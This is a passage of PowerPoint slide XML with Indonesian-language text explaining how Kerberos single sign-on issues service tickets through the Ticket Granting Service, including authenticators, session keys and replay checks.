        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30627057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Otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Masuk Tunggal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ticket Granting Service (TGS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGT. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan KDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (token yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target). Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh TGS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan nama server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGS. TGS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> replay).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan-digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stempel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SID) dan SID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggotanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
